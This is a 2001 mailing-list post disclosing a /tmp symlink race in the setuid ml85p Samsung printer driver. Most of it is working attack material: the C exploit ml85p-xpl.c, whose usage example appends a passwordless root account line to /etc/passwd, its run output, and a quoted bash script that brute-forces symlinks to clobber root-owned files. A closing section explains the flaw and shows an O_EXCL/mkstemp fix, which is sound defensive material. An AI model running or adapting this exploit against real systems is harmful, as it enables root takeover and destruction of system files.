Vulnerability Development mailing list archives

Re: ml85p - driver for Samsung ML-85G and /tmp


From: Charles Stevenson <core () ezlink com>
Date: Tue, 10 Jul 2001 12:18:17 -0600

Hey kev...

I downloaded the source for this and have it compiled... 

Check this out

[-(core@devastator:~/bleedingedge)> ./ml85p-xpl /etc/rc.owned by_core
ml85p-xpl.c by core (c) 2001
backing up /etc/rc.owned to /tmp/ez.TMwyqr
/bin/cp: cannot stat `/etc/rc.owned': No such file or directory
/bin/touch: getting attributes of `/etc/rc.owned': No such file or directory
creating a lot of symlinks
Running a few times since I'm lazy.
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
-rw-rw-r--    1 root     staff           0 Jul 10 12:16 /etc/rc.owned
cleaning up
All done. Enjoy!

Wanna play with it a bit more but we should publish it to bugtraq soon.

/* ml85p-xpl.c
 *
 * Quick hack to exploit ml85p
 *
 * Simply run it with the file you want to create/overwrite
 * and the data you wish to place in the file.
 *
 * Example:
 *
 * $ gcc -g -Wall ml85p-xpl.c -o ml85p-xpl
 * $ ./ml85p-xpl /etc/passwd owned::0:0::/root:/bin/bash
 *
 * Then login as owned... etc..
 *
 * by Charles Stevenson <core () ezlink com>
 *
 * July 10 2001
 *
 * shoutz b10z
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#include <time.h>

#define TEMPFILE "/tmp/ez.XXXXXX"
#define BRUTE 10

void usage(char*);

int main(int argc, char **argv){
   char tempfile[128] = TEMPFILE;
   int fd, i;
   time_t the_time;
   char temp[512];
   
   if (argc < 3){
      usage(argv[0]);
   }

   if((fd = mkstemp(tempfile))==-1){
      fprintf(stderr, "Error creating %s!\n",tempfile);
      exit(1);
   }

   /* begin lazy slacker coding */
   fprintf(stderr, "ml85p-xpl.c by core (c) 2001\n");
   fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile);

   /* backup old file */
   sprintf(temp, "/bin/cp %s %s", argv[1], tempfile);
   system(temp);
   
   /* set the date/time */
   sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile);
   system(temp);

   the_time = time(NULL);

   fprintf(stderr, "> creating a lot of symlinks\n");

   for (i=0;i<BRUTE;i++){
      /* BAD CODE: sprintf(gname,"/tmp/ml85g%d",time(0)); */
      /* time_t is not an int: cast it so the format matches on every ABI */
      sprintf(temp, "/tmp/ml85g%ld", (long)(the_time+i));
      symlink(argv[1], temp);
   }

   /* one string literal: the mail client had wrapped this line in two, which does not compile */
   sprintf(temp, "/bin/echo `perl -e 'print \"\\n\"'`%s > file; ml85p -sf file 2>&1>/dev/null & sleep 1; killall ml85p\n", argv[2]);
   fprintf(stderr, "Running a few times since I'm lazy.\n");
   for (i=0;i<BRUTE;i++){
      system(temp);
      //sleep(1);
   }

   sprintf(temp, "/bin/ls -l %s", argv[1]);
   system(temp);

   fprintf(stderr, "> cleaning up\n");
   sprintf(temp, "/bin/rm -f /tmp/ml85*");
   system(temp);
   
   fprintf(stderr, "All done. Enjoy!\n");
   return 0;
}

void usage(char *name){
   
   fprintf(stderr, "usage: %s <filename> <data>\n", name);
   exit(1);
}

/* EOF */

Best Regards,
Charles Stevenson

(b10z ownz :)

[401070dd] iopl(0x3)                    = 0
[400cf2bd] time(NULL)                   = 994462668
[40100cbf] brk(0)                       = 0x8064544
[40100cbf] brk(0x80646c4)               = 0x80646c4
[40100cbf] brk(0x8065000)               = 0x8065000
[400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3

I might have to hack the code to get that far since I don't have the printer.

I am not sure what other OSes pick for permissions by default...
Mandrake seems to not allow user access by default... I don't know
what group you need to have access to use this feature.

You can change the umask.
 
[d0tslash@linux d0tslash]$ /usr/bin/ml85p
bash: /usr/bin/ml85p: Permission denied

[d0tslash@linux d0tslash]$ ls -al /usr/bin/ml85p
-rwsr-x---    1 root     sys         11676 Mar 30 11:43 /usr/bin/ml85p*

For shits and giggles let's see what happens if it's got bad perms.
[root@linux exp]# chmod 4755 /usr/bin/ml85p

If it's installed from the tarball the perms are ok for sploitin'

[-(core@devastator:~/bleedingedge/ml85p-driver)> ls -l `which ml85p`
-r-sr-sr-x    1 root     staff       11196 Jul 10 11:25 /usr/local/bin/ml85p
 
in which case the results are as follows

[d0tslash@linux d0tslash]$ /usr/bin/ml85p -s (several times)
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463605
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463607
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463608
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463609

[d0tslash@linux d0tslash]$ cat ml85p-exp.c
// ln -s /etc/oops /tmp/ml85`./ml85p-exp`

#include <time.h>
#include <stdio.h>
int main(int argc,char **argv)
{
int x = time(NULL);
x = x + 30;
printf("%i\n", x);
}

[d0tslash@linux d0tslash]$ cat ml85p.sh
#!/bin/bash
# krfinisterre () checkfree com
echo "brute.sh <low> <hi>"
L=$1
H=$2
while [ $L -lt $H ]
do
        ln -s /etc/oops /tmp/ml85g`./ml85p-exp`
        let L=L+1
done

the following file is created.
-rw-r--r--    1 root     d0tslash        0 Jul  6 20:18 /etc/oops

Not sure what use this is short of clobbering files... Since the output is
sent to this file it may be possible to print
owned::0:0:root:/root:/bin/bash to this driver and it may append it to the
file in /tmp... I am not sure though... just an idea
-KF
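The whole thread turns on one pattern: a name derived from time(0) (the BAD CODE line quoted in ml85p-xpl.c above) opened with O_CREAT|O_TRUNC and no O_EXCL (the open("/tmp/ml85g994462668", ...) line in the trace above). As an added illustration, not code from either poster, the block below puts that open beside the O_EXCL form that mkstemp() relies on and checks both against a pre-planted symlink inside a private scratch directory it creates itself; the scratch name ml85demo.XXXXXX, the file name victim and the helper function names are constructed for the demo.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <time.h>
#include <unistd.h>

/* The driver's pattern as reported in the thread: a name derived from time(0),
 * opened with O_CREAT|O_TRUNC. If a symlink already sits at that name, open()
 * follows it and the privileged process creates or truncates the link target. */
int open_predictable(const char *dir, time_t now) {
    char name[256];
    snprintf(name, sizeof name, "%s/ml85g%ld", dir, (long)now);
    return open(name, O_RDWR | O_CREAT | O_TRUNC, 0666);
}

/* Hardened form: O_EXCL makes open() fail with EEXIST on any existing entry,
 * symlinks included (this is the guarantee mkstemp() builds on). */
int open_exclusive(const char *dir, time_t now) {
    char name[256];
    snprintf(name, sizeof name, "%s/ml85g%ld", dir, (long)now);
    return open(name, O_RDWR | O_CREAT | O_EXCL, 0600);
}

/* Self-contained check in a private scratch directory (constructed for the
 * demo): plant a symlink at the predicted name, then try both opens. Returns 1
 * when the predictable open followed the link and the exclusive one refused. */
int demo_symlink_race(void) {
    char dir[] = "/tmp/ml85demo.XXXXXX";
    char link[300], target[300];
    struct stat st;
    int fd, rc = -1;
    if (!mkdtemp(dir)) return -1;
    time_t now = time(NULL);
    snprintf(target, sizeof target, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/ml85g%ld", dir, (long)now);
    if (symlink(target, link) == 0) {
        fd = open_predictable(dir, now);       /* follows the dangling link */
        int followed = fd >= 0 && stat(target, &st) == 0;
        if (fd >= 0) close(fd);
        fd = open_exclusive(dir, now);         /* refused: EEXIST */
        int refused = fd < 0 && errno == EEXIST;
        if (fd >= 0) close(fd);
        rc = followed && refused;
    }
    unlink(target); unlink(link); rmdir(dir);
    return rc;
}
```

Current Linux kernels also stop a privileged process from following a symlink owned by another user in a sticky world-writable directory such as /tmp (fs.protected_symlinks), but that is a system-wide safety net; the driver itself should create its spool file with mkstemp() or O_EXCL.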
